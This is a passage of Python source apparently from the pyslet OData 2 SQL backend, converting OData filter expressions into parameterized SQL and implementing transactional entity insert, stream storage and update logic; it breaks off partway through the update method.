for sub_path, fv in self._complex_field_generator(v):
source_path = tuple([self.entity_set.name, k] +
sub_path)
yield self._mangle_name(source_path, prefix), fv
def update_fields(self, entity):
"""A generator for updating mangled property names and values.
entity
Any instance of :py:class:`~pyslet.odata2.csdl.Entity`
The yielded values are tuples of (mangled field name,
:py:class:`~pyslet.odata2.csdl.SimpleValue` instance).
        Neither read only fields nor keys are generated. All other
fields are yielded but unselected fields are set to NULL before
being yielded. This implements OData's PUT semantics. See
:py:meth:`merge_fields` for an alternative."""
keys = entity.entity_set.keys
for k, v in entity.data_items():
source_path = (self.entity_set.name, k)
if k in keys or source_path in self.container.ro_names:
continue
if not entity.is_selected(k):
v.set_null()
if isinstance(v, edm.SimpleValue):
yield self._mangle_name(source_path, prefix=False), v
else:
for sub_path, fv in self._complex_field_generator(v):
source_path = tuple([self.entity_set.name, k] +
sub_path)
yield self._mangle_name(source_path, prefix=False), fv
def merge_fields(self, entity):
"""A generator for merging mangled property names and values.
entity
Any instance of :py:class:`~pyslet.odata2.csdl.Entity`
The yielded values are tuples of (mangled field name,
:py:class:`~pyslet.odata2.csdl.SimpleValue` instance).
Neither read only fields, keys nor unselected fields are
generated. All other fields are yielded implementing OData's
MERGE semantics. See
:py:meth:`update_fields` for an alternative."""
keys = entity.entity_set.keys
for k, v in entity.data_items():
source_path = (self.entity_set.name, k)
if (k in keys or
source_path in self.container.ro_names or
not entity.is_selected(k)):
continue
if isinstance(v, edm.SimpleValue):
yield self._mangle_name(source_path), v
else:
for sub_path, fv in self._complex_field_generator(v):
source_path = tuple([self.entity_set.name, k] +
sub_path)
yield self._mangle_name(source_path), fv
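    # Illustrative note (hypothetical properties): given an entity with
    # non-key properties Name and Notes where only Name is selected,
    # update_fields yields both columns (with Notes set to NULL, giving PUT
    # semantics) whereas merge_fields yields only Name, leaving Notes
    # untouched (MERGE semantics).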
def _complex_field_generator(self, ct):
for k, v in ct.iteritems():
if isinstance(v, edm.SimpleValue):
yield [k], v
else:
for source_path, fv in self._complex_field_generator(v):
yield [k] + source_path, fv
def stream_field(self, entity, prefix=True):
"""Returns information for selecting the stream ID.
entity
Any instance of :py:class:`~pyslet.odata2.csdl.Entity`
        Returns a tuple of (mangled field name,
:py:class:`~pyslet.odata2.csdl.SimpleValue` instance)."""
source_path = (self.entity_set.name, '_value')
return self._mangle_name(source_path, prefix), \
edm.EDMValue.from_type(edm.SimpleType.Int64)
SQLBinaryExpressionMethod = {}
SQLCallExpressionMethod = {}
def sql_expression(self, expression, params, context="AND"):
"""Converts an expression into a SQL expression string.
expression
A :py:class:`pyslet.odata2.core.CommonExpression` instance.
params
A :py:class:`SQLParams` object of the appropriate type for
this database connection.
context
A string containing the SQL operator that provides the
context in which the expression is being converted, defaults
to 'AND'. This is used to determine if the resulting
expression must be bracketed or not. See
:py:meth:`sql_bracket` for a useful utility function to
illustrate this.
This method is basically a grand dispatcher that sends calls to
other node-specific methods with similar signatures. The effect
is to traverse the entire tree rooted at *expression*.
The result is a string containing the parameterized expression
with appropriate values added to the *params* object *in the same
sequence* that they appear in the returned SQL expression.
When creating derived classes to implement database-specific
behaviour you should override the individual evaluation methods
rather than this method. All related methods have the same
signature.
Where methods are documented as having no default implementation,
NotImplementedError is raised."""
if isinstance(expression, core.UnaryExpression):
raise NotImplementedError
elif isinstance(expression, core.BinaryExpression):
return getattr(
self,
self.SQLBinaryExpressionMethod[
expression.operator])(
expression,
params,
context)
elif isinstance(expression, UnparameterizedLiteral):
return self.container.ParamsClass.escape_literal(
to_text(expression.value))
elif isinstance(expression, core.LiteralExpression):
return params.add_param(
self.container.prepare_sql_value(
expression.value))
elif isinstance(expression, core.PropertyExpression):
try:
p = self.entity_set.entityType[expression.name]
if isinstance(p, edm.Property):
if p.complexType is None:
field_name = self.container.mangled_names[
(self.entity_set.name, expression.name)]
return "%s.%s" % (self.table_name, field_name)
else:
raise core.EvaluationError(
"Unqualified property %s "
"must refer to a simple type" %
expression.name)
except KeyError:
raise core.EvaluationError(
"Property %s is not declared" % expression.name)
elif isinstance(expression, core.CallExpression):
return getattr(
self,
self.SQLCallExpressionMethod[
expression.method])(
expression,
params,
context)
def sql_bracket(self, query, context, operator):
"""A utility method for bracketing a SQL query.
query
The query string
context
A string representing the SQL operator that defines the
            context in which the query is to be placed. E.g., 'AND'
operator
The dominant operator in the query.
This method is used by operator-specific conversion methods.
The query is not parsed, it is merely passed in as a string to be
bracketed (or not) depending on the values of *context* and
*operator*.
The implementation is very simple, it checks the precedence of
*operator* in *context* and returns *query* bracketed if
necessary::
collection.sql_bracket("Age+3","*","+")=="(Age+3)"
collection.sql_bracket("Age*3","+","*")=="Age*3" """
if SQLOperatorPrecedence[context] > SQLOperatorPrecedence[operator]:
return "(%s)" % query
else:
return query
def sql_expression_member(self, expression, params, context):
"""Converts a member expression, e.g., Address/City
This implementation does not support the use of navigation
properties but does support references to complex properties.
It outputs the mangled name of the property, qualified by the
table name."""
name_list = self._calculate_member_field_name(expression)
context_def = self.entity_set.entityType
depth = 0
table_name = self.table_name
entity_set = self.entity_set
path = []
for name in name_list:
if context_def is None:
raise core.EvaluationError("Property %s is not declared" %
'/'.join(name_list))
p = context_def[name]
if isinstance(p, edm.Property):
path.append(name)
if p.complexType is not None:
context_def = p.complexType
else:
context_def = None
elif isinstance(p, edm.NavigationProperty):
if depth > 0:
raise NotImplementedError(
"Member expression exceeds maximum navigation depth")
else:
table_name = self.add_join(name)
context_def = p.to_end.entityType
depth += 1
path = []
entity_set = entity_set.get_target(name)
        # the result must be a simple property, so context_def must be None
if context_def is not None:
raise core.EvaluationError(
"Property %s does not reference a primitive type" %
'/'.join(name_list))
field_name = self.container.mangled_names[
tuple([entity_set.name] + path)]
return "%s.%s" % (table_name, field_name)
def _calculate_member_field_name(self, expression):
if isinstance(expression, core.PropertyExpression):
return [expression.name]
elif (isinstance(expression, core.BinaryExpression) and
expression.operator == core.Operator.member):
return (
self._calculate_member_field_name(expression.operands[0]) +
self._calculate_member_field_name(expression.operands[1]))
else:
raise core.EvaluationError("Unexpected use of member expression")
def sql_expression_cast(self, expression, params, context):
"""Converts the cast expression: no default implementation"""
raise NotImplementedError
def sql_expression_generic_binary(
self,
expression,
params,
context,
operator):
"""A utility method for implementing binary operator conversion.
The signature of the basic :py:meth:`sql_expression` is extended
to include an *operator* argument, a string representing the
(binary) SQL operator corresponding to the expression object."""
query = []
query.append(
self.sql_expression(expression.operands[0], params, operator))
query.append(' ')
query.append(operator)
query.append(' ')
query.append(
self.sql_expression(expression.operands[1], params, operator))
return self.sql_bracket(''.join(query), context, operator)
def sql_expression_mul(self, expression, params, context):
"""Converts the mul expression: maps to SQL "*" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'*')
def sql_expression_div(self, expression, params, context):
"""Converts the div expression: maps to SQL "/" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'/')
def sql_expression_mod(self, expression, params, context):
"""Converts the mod expression: no default implementation"""
raise NotImplementedError
def sql_expression_add(self, expression, params, context):
"""Converts the add expression: maps to SQL "+" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'+')
def sql_expression_sub(self, expression, params, context):
"""Converts the sub expression: maps to SQL "-" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'-')
def sql_expression_lt(self, expression, params, context):
"""Converts the lt expression: maps to SQL "<" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'<')
def sql_expression_gt(self, expression, params, context):
"""Converts the gt expression: maps to SQL ">" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'>')
def sql_expression_le(self, expression, params, context):
"""Converts the le expression: maps to SQL "<=" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'<=')
def sql_expression_ge(self, expression, params, context):
"""Converts the ge expression: maps to SQL ">=" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'>=')
def sql_expression_isof(self, expression, params, context):
"""Converts the isof expression: no default implementation"""
raise NotImplementedError
def sql_expression_eq(self, expression, params, context):
"""Converts the eq expression: maps to SQL "=" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'=')
def sql_expression_ne(self, expression, params, context):
"""Converts the ne expression: maps to SQL "<>" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'<>')
def sql_expression_and(self, expression, params, context):
"""Converts the and expression: maps to SQL "AND" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'AND')
def sql_expression_or(self, expression, params, context):
"""Converts the or expression: maps to SQL "OR" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'OR')
def sql_expression_endswith(self, expression, params, context):
"""Converts the endswith function: maps to "op[0] LIKE '%'+op[1]"
This is implemented using the concatenation operator"""
percent = edm.SimpleValue.from_type(edm.SimpleType.String)
percent.set_from_value("'%'")
percent = UnparameterizedLiteral(percent)
concat = core.CallExpression(core.Method.concat)
concat.operands.append(percent)
concat.operands.append(expression.operands[1])
query = []
query.append(
self.sql_expression(expression.operands[0], params, 'LIKE'))
query.append(" LIKE ")
query.append(self.sql_expression(concat, params, 'LIKE'))
return self.sql_bracket(''.join(query), context, 'LIKE')
def sql_expression_indexof(self, expression, params, context):
"""Converts the indexof method: maps to POSITION( op[0] IN op[1] )"""
query = ["POSITION("]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(" IN ")
query.append(self.sql_expression(expression.operands[1], params, ','))
query.append(")")
return ''.join(query)
def sql_expression_replace(self, expression, params, context):
"""Converts the replace method: no default implementation"""
raise NotImplementedError
def sql_expression_startswith(self, expression, params, context):
"""Converts the startswith function: maps to "op[0] LIKE op[1]+'%'"
This is implemented using the concatenation operator"""
percent = edm.SimpleValue.from_type(edm.SimpleType.String)
percent.set_from_value("'%'")
percent = UnparameterizedLiteral(percent)
concat = core.CallExpression(core.Method.concat)
concat.operands.append(expression.operands[1])
concat.operands.append(percent)
query = []
query.append(
self.sql_expression(expression.operands[0], params, 'LIKE'))
query.append(" LIKE ")
query.append(self.sql_expression(concat, params, 'LIKE'))
return self.sql_bracket(''.join(query), context, 'LIKE')
def sql_expression_tolower(self, expression, params, context):
"""Converts the tolower method: maps to LOWER function"""
return "LOWER(%s)" % self.sql_expression(
expression.operands[0],
params,
',')
def sql_expression_toupper(self, expression, params, context):
"""Converts the toupper method: maps to UCASE function"""
return "UPPER(%s)" % self.sql_expression(
expression.operands[0],
params,
',')
def sql_expression_trim(self, expression, params, context):
"""Converts the trim method: maps to TRIM function"""
return "TRIM(%s)" % self.sql_expression(
expression.operands[0],
params,
',')
def sql_expression_substring(self, expression, params, context):
"""Converts the substring method
        maps to SUBSTRING( op[0] FROM op[1] [ FOR op[2] ] )"""
query = ["SUBSTRING("]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(" FROM ")
query.append(self.sql_expression(expression.operands[1], params, ','))
        if len(expression.operands) > 2:
query.append(" FOR ")
query.append(
self.sql_expression(expression.operands[2], params, ','))
query.append(")")
return ''.join(query)
def sql_expression_substringof(self, expression, params, context):
"""Converts the substringof function
maps to "op[1] LIKE '%'+op[0]+'%'"
To do this we need to invoke the concatenation operator.
This method has been poorly defined in OData with the parameters
being switched between versions 2 and 3. It is being withdrawn
as a result and replaced with contains in OData version 4. We
follow the version 3 convention here of "first parameter in the
second parameter" which fits better with the examples and with
the intuitive meaning::
substringof(A,B) == A in B"""
percent = edm.SimpleValue.from_type(edm.SimpleType.String)
percent.set_from_value("'%'")
percent = UnparameterizedLiteral(percent)
rconcat = core.CallExpression(core.Method.concat)
rconcat.operands.append(expression.operands[0])
rconcat.operands.append(percent)
lconcat = core.CallExpression(core.Method.concat)
lconcat.operands.append(percent)
lconcat.operands.append(rconcat)
query = []
query.append(
self.sql_expression(expression.operands[1], params, 'LIKE'))
query.append(" LIKE ")
query.append(self.sql_expression(lconcat, params, 'LIKE'))
return self.sql_bracket(''.join(query), context, 'LIKE')
def sql_expression_concat(self, expression, params, context):
"""Converts the concat method: maps to ||"""
query = []
query.append(self.sql_expression(expression.operands[0], params, '*'))
query.append(' || ')
query.append(self.sql_expression(expression.operands[1], params, '*'))
return self.sql_bracket(''.join(query), context, '*')
def sql_expression_length(self, expression, params, context):
"""Converts the length method: maps to CHAR_LENGTH( op[0] )"""
return "CHAR_LENGTH(%s)" % self.sql_expression(
expression.operands[0],
params,
',')
def sql_expression_year(self, expression, params, context):
"""Converts the year method: maps to EXTRACT(YEAR FROM op[0])"""
return "EXTRACT(YEAR FROM %s)" % self.sql_expression(
expression.operands[0],
params,
',')
def sql_expression_month(self, expression, params, context):
"""Converts the month method: maps to EXTRACT(MONTH FROM op[0])"""
return "EXTRACT(MONTH FROM %s)" % self.sql_expression(
expression.operands[0],
params,
',')
def sql_expression_day(self, expression, params, context):
"""Converts the day method: maps to EXTRACT(DAY FROM op[0])"""
return "EXTRACT(DAY FROM %s)" % self.sql_expression(
expression.operands[0],
params,
',')
def sql_expression_hour(self, expression, params, context):
"""Converts the hour method: maps to EXTRACT(HOUR FROM op[0])"""
return "EXTRACT(HOUR FROM %s)" % self.sql_expression(
expression.operands[0],
params,
',')
def sql_expression_minute(self, expression, params, context):
"""Converts the minute method: maps to EXTRACT(MINUTE FROM op[0])"""
return "EXTRACT(MINUTE FROM %s)" % self.sql_expression(
expression.operands[0],
params,
',')
def sql_expression_second(self, expression, params, context):
"""Converts the second method: maps to EXTRACT(SECOND FROM op[0])"""
return "EXTRACT(SECOND FROM %s)" % self.sql_expression(
expression.operands[0],
params,
',')
def sql_expression_round(self, expression, params, context):
"""Converts the round method: no default implementation"""
raise NotImplementedError
def sql_expression_floor(self, expression, params, context):
"""Converts the floor method: no default implementation"""
raise NotImplementedError
def sql_expression_ceiling(self, expression, params, context):
"""Converts the ceiling method: no default implementation"""
raise NotImplementedError
SQLCollectionBase.SQLCallExpressionMethod = {
core.Method.endswith: 'sql_expression_endswith',
core.Method.indexof: 'sql_expression_indexof',
core.Method.replace: 'sql_expression_replace',
core.Method.startswith: 'sql_expression_startswith',
core.Method.tolower: 'sql_expression_tolower',
core.Method.toupper: 'sql_expression_toupper',
core.Method.trim: 'sql_expression_trim',
core.Method.substring: 'sql_expression_substring',
core.Method.substringof: 'sql_expression_substringof',
core.Method.concat: 'sql_expression_concat',
core.Method.length: 'sql_expression_length',
core.Method.year: 'sql_expression_year',
core.Method.month: 'sql_expression_month',
core.Method.day: 'sql_expression_day',
core.Method.hour: 'sql_expression_hour',
core.Method.minute: 'sql_expression_minute',
core.Method.second: 'sql_expression_second',
core.Method.round: 'sql_expression_round',
core.Method.floor: 'sql_expression_floor',
core.Method.ceiling: 'sql_expression_ceiling'
}
SQLCollectionBase.SQLBinaryExpressionMethod = {
core.Operator.member: 'sql_expression_member',
core.Operator.cast: 'sql_expression_cast',
core.Operator.mul: 'sql_expression_mul',
core.Operator.div: 'sql_expression_div',
core.Operator.mod: 'sql_expression_mod',
core.Operator.add: 'sql_expression_add',
core.Operator.sub: 'sql_expression_sub',
core.Operator.lt: 'sql_expression_lt',
core.Operator.gt: 'sql_expression_gt',
core.Operator.le: 'sql_expression_le',
core.Operator.ge: 'sql_expression_ge',
core.Operator.isof: 'sql_expression_isof',
core.Operator.eq: 'sql_expression_eq',
core.Operator.ne: 'sql_expression_ne',
core.Operator.boolAnd: 'sql_expression_and',
core.Operator.boolOr: 'sql_expression_or'
}
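# These two tables map parsed OData call methods and binary operators to
# the names of the converter methods defined above; the expression
# serialiser in SQLCollectionBase presumably resolves the target method
# by name (e.g. with getattr) while walking an expression tree.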
class SQLEntityCollection(SQLCollectionBase):
"""Represents a collection of entities from an :py:class:`EntitySet`.
This class is the heart of the SQL implementation of the API,
constructing and executing queries to implement the core methods
from :py:class:`pyslet.odata2.csdl.EntityCollection`."""
def insert_entity(self, entity):
"""Inserts *entity* into the collection.
We override this method, rerouting it to a SQL-specific
implementation that takes additional arguments."""
self.insert_entity_sql(entity)
def new_stream(self, src, sinfo=None, key=None):
e = self.new_entity()
if key is None:
e.auto_key()
else:
e.set_key(key)
if sinfo is None:
sinfo = core.StreamInfo()
etag = e.etag_values()
if len(etag) == 1 and isinstance(etag[0], edm.BinaryValue):
h = hashlib.sha256()
etag = etag[0]
else:
h = None
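# If the concurrency token is a single binary value we compute a
# SHA-256 digest of the stream while it is copied (h is passed to
# _copy_src below) and use it as the ETag once the copy completes.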
c, v = self.stream_field(e, prefix=False)
if self.container.streamstore:
# spool the data into the store and store the stream key
estream = self.container.streamstore.new_stream(sinfo.type,
sinfo.created)
with self.container.streamstore.open_stream(estream, 'w') as dst:
sinfo.size, sinfo.md5 = self._copy_src(src, dst, sinfo.size, h)
if sinfo.modified is not None:
# force modified date based on input
estream['modified'].set_from_value(
sinfo.modified.shift_zone(0))
estream.commit()
v.set_from_value(estream.key())
else:
raise NotImplementedError
if h is not None:
etag.set_from_value(h.digest())
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
# now try the insert and loop with random keys if required
for i in range3(100):
try:
self.insert_entity_sql(e, transaction=transaction)
break
except edm.ConstraintError:
# try a different key
e.auto_key()
if not e.exists:
# give up - we can't insert anything
logging.error("Failed to find an unused key in %s "
"after 100 attempts", e.entity_set.name)
raise edm.SQLError("Auto-key failure")
# finally, store the stream value for the entity
query = ['UPDATE ', self.table_name, ' SET ']
params = self.container.ParamsClass()
query.append(
"%s=%s" %
(c, params.add_param(self.container.prepare_sql_value(v))))
query.append(' WHERE ')
where = []
for k, kv in dict_items(e.key_dict()):
where.append(
'%s=%s' %
(self.container.mangled_names[(self.entity_set.name, k)],
params.add_param(self.container.prepare_sql_value(kv))))
query.append(' AND '.join(where))
query = ''.join(query)
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
except Exception as e:
# we allow the stream store to re-use the same database but
# this means we can't transact on both at once (from the
# same thread) - settle for logging at the moment
# self.container.streamstore.delete_stream(estream)
logging.error("Orphan stream created %s[%i]",
estream.entity_set.name, estream.key())
transaction.rollback(e)
finally:
transaction.close()
return e
def insert_entity_sql(
self,
entity,
from_end=None,
fk_values=None,
transaction=None):
"""Inserts *entity* into the collection.
This method is not designed to be overridden by other
implementations but it does extend the default functionality for
a more efficient implementation and to enable better
transactional processing. The additional parameters are
documented here.
from_end
An optional :py:class:`pyslet.odata2.csdl.AssociationSetEnd`
bound to this entity set. If present, indicates that this
entity is being inserted as part of a single transaction
involving an insert or update to the other end of the
association.
This suppresses any check for a required link via this
association (as it is assumed that the link is present, or
will be, in the same transaction).
fk_values
If the association referred to by *from_end* is represented
by a set of foreign keys stored in this entity set's table
(see :py:class:`SQLReverseKeyCollection`) then fk_values is
the list of (mangled column name, value) tuples that must be
inserted in order to create the link.
transaction
An optional transaction. If present, the connection is left
uncommitted.
The method functions in three phases.
1. Process all bindings for which we hold the foreign key.
This includes inserting new entities where deep inserts are
being used or calculating foreign key values where links to
existing entities have been specified on creation.
In addition, all required links are checked and raise errors
if no binding is present.
2. A simple SQL INSERT statement is executed to add the record
to the database along with any foreign keys generated in (1)
or passed in *fk_values*.
3. Process all remaining bindings. Although we could do this
using the
:py:meth:`~pyslet.odata2.csdl.DeferredValue.update_bindings`
method of DeferredValue we handle this directly to retain
transactional integrity (where supported).
Links to existing entities are created using the insert_link
method available on the SQL-specific
:py:class:`SQLNavigationCollection`.
Deep inserts are handled by a recursive call to this method.
After step 1, the only bindings that remain are (a) those
that are stored at the other end of the link and so can be
created by passing values for *from_end* and *fk_values* in a
recursive call or (b) those that are stored in a separate
table which are created by combining a recursive call and a
call to insert_link.
Required links are always created in step 1 because the
overarching mapping to SQL forces such links to be represented
as foreign keys in the source table (i.e., this table) unless
the relationship is 1-1, in which case the link is created in
step 3 and our database is briefly in violation of the model. If
the underlying database API does not support transactions then
it is possible for this state to persist resulting in an orphan
entity or entities, i.e., entities with missing required links.
A failed :py:meth:`rollback` call will log this condition along
with the error that caused it."""
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
if entity.exists:
raise edm.EntityExists(str(entity.get_location()))
# We must also go through each bound navigation property of our
# own and add in the foreign keys for forward links.
if fk_values is None:
fk_values = []
fk_mapping = self.container.fk_table[self.entity_set.name]
try:
transaction.begin()
nav_done = set()
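# Step 1: process all bindings for which we hold the foreign key,
# checking required links and accumulating fk_values as we go.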
for link_end, nav_name in dict_items(self.entity_set.linkEnds):
if nav_name:
dv = entity[nav_name]
if (link_end.otherEnd.associationEnd.multiplicity ==
edm.Multiplicity.One):
# a required association
if link_end == from_end:
continue
if nav_name is None:
# unbound principal; can only be created from this
# association
raise edm.NavigationError(
"Entities in %s can only be created "
"from their principal" % self.entity_set.name)
if not dv.bindings:
raise edm.NavigationError(
"Required navigation property %s of %s "
"is not bound" % (nav_name, self.entity_set.name))
aset_name = link_end.parent.name
# if link_end is in fk_mapping it means we are keeping a
# foreign key for this property, it may even be required but
# either way, let's deal with it now. We're only interested
# in associations that are bound to navigation properties.
if link_end not in fk_mapping or nav_name is None:
continue
nullable, unique = fk_mapping[link_end]
target_set = link_end.otherEnd.entity_set
if len(dv.bindings) == 0:
# we've already checked the case where nullable is False
# above
continue
elif len(dv.bindings) > 1:
raise edm.NavigationError(
"Unexpected error: found multiple bindings "
"for foreign key constraint %s" % nav_name)
binding = dv.bindings[0]
if not isinstance(binding, edm.Entity):
# just a key, grab the entity
with target_set.open() as targetCollection:
targetCollection.select_keys()
target_entity = targetCollection[binding]
dv.bindings[0] = target_entity
else:
target_entity = binding
if not target_entity.exists:
# add this entity to its base collection
with target_set.open() as targetCollection:
targetCollection.insert_entity_sql(
target_entity,
link_end.otherEnd,
transaction=transaction)
# Finally, we have a target entity, add the foreign key to
# fk_values
for key_name in target_set.keys:
fk_values.append(
(self.container.mangled_names[
(self.entity_set.name,
aset_name,
key_name)],
target_entity[key_name]))
nav_done.add(nav_name)
# Step 2
try:
entity.key()
except KeyError:
# missing key on insert, auto-generate if we can
for i in range3(100):
entity.auto_key()
if not self.test_key(entity, transaction):
break
entity.set_concurrency_tokens()
query = ['INSERT INTO ', self.table_name, ' (']
insert_values = list(self.insert_fields(entity))
# watch out for exposed FK fields!
for fkname, fkv in fk_values:
i = 0
while i < len(insert_values):
iname, iv = insert_values[i]
if fkname == iname:
# fk overrides - update the entity's value
iv.set_from_value(fkv.value)
# now drop it from the list to prevent
# double column names
del insert_values[i]
else:
i += 1
column_names, values = zip(*(insert_values + fk_values))
query.append(", ".join(column_names))
query.append(') VALUES (')
params = self.container.ParamsClass()
query.append(
", ".join(params.add_param(
self.container.prepare_sql_value(x)) for x in values))
query.append(')')
query = ''.join(query)
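# The assembled statement is roughly (illustrative names; the actual
# parameter marker depends on the container's ParamsClass):
#     INSERT INTO Orders (OrderID, OrdersToCustomers_CustomerID, ...)
#     VALUES (?, ?, ...)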
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
# before we can say the entity exists we need to ensure
# we have the key
auto_fields = list(self.auto_fields(entity))
if auto_fields:
# refresh these fields in the entity
self.get_auto(entity, auto_fields, transaction)
entity.exists = True
# Step 3
for k, dv in entity.navigation_items():
link_end = self.entity_set.navigation[k]
if not dv.bindings:
continue
elif k in nav_done:
dv.bindings = []
continue
aset_name = link_end.parent.name
target_set = dv.target()
target_fk_mapping = self.container.fk_table[target_set.name]
with dv.open() as navCollection:
with target_set.open() as targetCollection:
while dv.bindings:
binding = dv.bindings[0]
if not isinstance(binding, edm.Entity):
targetCollection.select_keys()
binding = targetCollection[binding]
if binding.exists:
navCollection.insert_link(binding, transaction)
else:
if link_end.otherEnd in target_fk_mapping:
# target table has a foreign key
target_fk_values = []
for key_name in self.entity_set.keys:
target_fk_values.append(
(self.container.mangled_names[
(target_set.name,
aset_name,
key_name)],
entity[key_name]))
targetCollection.insert_entity_sql(
binding,
link_end.otherEnd,
target_fk_values,
transaction=transaction)
else:
# foreign keys are in an auxiliary table
targetCollection.insert_entity_sql(
binding,
link_end.otherEnd,
transaction=transaction)
navCollection.insert_link(
binding, transaction)
dv.bindings = dv.bindings[1:]
transaction.commit()
except self.container.dbapi.IntegrityError as e:
# we might need to distinguish between a failure due to
# fk_values or a missing key
transaction.rollback(e, swallow=True)
# swallow the error as this should indicate a failure at the
# point of INSERT, fk_values may have violated a unique
# constraint but we can't make that distinction at the
# moment.
raise edm.ConstraintError(
"insert_entity failed for %s : %s" %
(str(
entity.get_location()),
str(e)))
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def get_auto(self, entity, auto_fields, transaction):
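"""Reads back auto-generated column values after an INSERT
auto_fields is a list of (mangled column name, EDM value) tuples;
the values are read back from the database into the entity, which
is then expanded and selected as usual."""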
params = self.container.ParamsClass()
query = ["SELECT "]
column_names, values = zip(*auto_fields)
query.append(", ".join(column_names))
query.append(' FROM ')
query.append(self.table_name)
# no join clause required
if self.auto_keys:
query.append(self.where_last(entity, params))
else:
query.append(self.where_clause(entity, params, use_filter=False))
query = ''.join(query)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
rowcount = transaction.cursor.rowcount
row = transaction.cursor.fetchone()
if rowcount == 0 or row is None:
raise KeyError
elif rowcount > 1 or (rowcount == -1 and
transaction.cursor.fetchone() is not None):
# whoops, that was unexpected
raise SQLError(
"Integrity check failure, non-unique key after insert")
for value, new_value in zip(values, row):
self.container.read_sql_value(value, new_value)
entity.expand(self.expand, self.select)
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def test_key(self, entity, transaction):
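"""Returns True if a row matching *entity*'s key already exists
Used by :py:meth:`insert_entity_sql` to detect collisions when
auto-generating keys before attempting the INSERT."""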
params = self.container.ParamsClass()
query = ["SELECT "]
column_names, values = zip(*list(self.key_fields(entity)))
query.append(", ".join(column_names))
query.append(' FROM ')
query.append(self.table_name)
query.append(self.where_clause(entity, params, use_filter=False))
query = ''.join(query)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
rowcount = transaction.cursor.rowcount
row = transaction.cursor.fetchone()
if rowcount == 0 or row is None:
result = False
elif rowcount > 1 or (rowcount == -1 and
transaction.cursor.fetchone() is not None):
# whoops, that was unexpected
raise SQLError(
"Integrity check failure, non-unique key: %s" %
repr(entity.key()))
else:
result = True
transaction.commit()
return result
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def where_last(self, entity, params):
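"""Returns a WHERE clause identifying the last row inserted
There is no default implementation; containers that support
automatically generated keys are expected to override this method
(for example, using the DB API cursor's lastrowid where that is
available)."""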
raise NotImplementedError("Automatic keys not supported")
def update_entity(self, entity):
"""Updates *entity*
This method follows a very similar pattern to :py:meth:`insert_entity_sql`,
using a three-phase process.
1. Process all bindings for which we hold the foreign key.
This includes inserting new entities where deep inserts are
being used or calculating foreign key values where links to
existing entities have been specified on update.
2. A simple SQL UPDATE statement is executed to update the
record in the database along with any updated foreign keys
generated in (1).
3. Process all remaining bindings while retaining transactional
integrity (where supported).
Links to existing entities are created using the insert_link
or replace methods available on the SQL-specific
:py:class:`SQLNavigationCollection`. The replace method is
used when a navigation property that links to a single
entity has been bound. Deep inserts are handled by calling
insert_entity_sql before the link is created.
The same transactional behaviour as :py:meth:`insert_entity_sql` is
exhibited."""
if not entity.exists:
raise edm.NonExistentEntity(
"Attempt to update non existent entity: " +
str(entity.get_location()))
fk_values = []
fk_mapping = self.container.fk_table[self.entity_set.name]
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
nav_done = set()
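# Step 1: process the bindings for which we hold the foreign key,
# accumulating updated fk_values as we go.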
for k, dv in entity.navigation_items():
link_end = self.entity_set.navigation[k]
if not dv.bindings:
continue
aset_name = link_end.parent.name
# if link_end is in fk_mapping it means we are keeping a
# foreign key for this property, it may even be required but
# either way, let's deal with it now. This will insert or
# update the link automatically, this navigation property
# can never be a collection
if link_end not in fk_mapping:
continue
target_set = link_end.otherEnd.entity_set
nullable, unique = fk_mapping[link_end]
if len(dv.bindings) > 1:
raise edm.NavigationError(
"Unexpected error: found multiple bindings for "
"foreign key constraint %s" % k)
binding = dv.bindings[0]
if not isinstance(binding, edm.Entity):
# just a key, grab the entity
with target_set.open() as targetCollection:
targetCollection.select_keys()
target_entity = targetCollection[binding]
dv.bindings[0] = target_entity
else:
target_entity = binding
if not target_entity.exists:
# add this entity to its base collection
with target_set.open() as targetCollection:
targetCollection.insert_entity_sql(
target_entity, link_end.otherEnd,
transaction=transaction)
# Finally, we have a target entity, add the foreign key to
# fk_values
for key_name in target_set.keys:
fk_values.append(
(self.container.mangled_names[
(self.entity_set.name,
aset_name,
key_name)],
target_entity[key_name]))
nav_done.add(k)
# grab a list of sql-name,sql-value pairs representing the key
# constraint
concurrency_check = False
constraints = []
for k, v in dict_items(entity.key_dict()):
constraints.append(
(self.container.mangled_names[
(self.entity_set.name, k)],
self.container.prepare_sql_value(v)))
key_len = len(constraints)
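# key_len records how many of the constraints are pure key fields;
# the concurrency tokens appended below are stripped again (via
# constraints[:key_len]) when re-checking existence after a failed
# UPDATE.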
cv_list = list(self.update_fields(entity))
for cname, v in cv_list:
# concurrency tokens get added as if they were part of the key
if v.p_def.concurrencyMode == edm.ConcurrencyMode.Fixed:
concurrency_check = True
constraints.append(
(cname, self.container.prepare_sql_value(v)))
# now update the entity to have the latest concurrency token
entity.set_concurrency_tokens()
query = ['UPDATE ', self.table_name, ' SET ']
params = self.container.ParamsClass()
updates = []
for cname, v in cv_list + fk_values:
updates.append(
'%s=%s' %
(cname,
params.add_param(self.container.prepare_sql_value(v))))
if updates:
query.append(', '.join(updates))
query.append(' WHERE ')
where = []
for cname, cvalue in constraints:
where.append('%s=%s' % (cname, params.add_param(cvalue)))
query.append(' AND '.join(where))
query = ''.join(query)
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
if updates and transaction.cursor.rowcount == 0:
# we need to check if this entity really exists
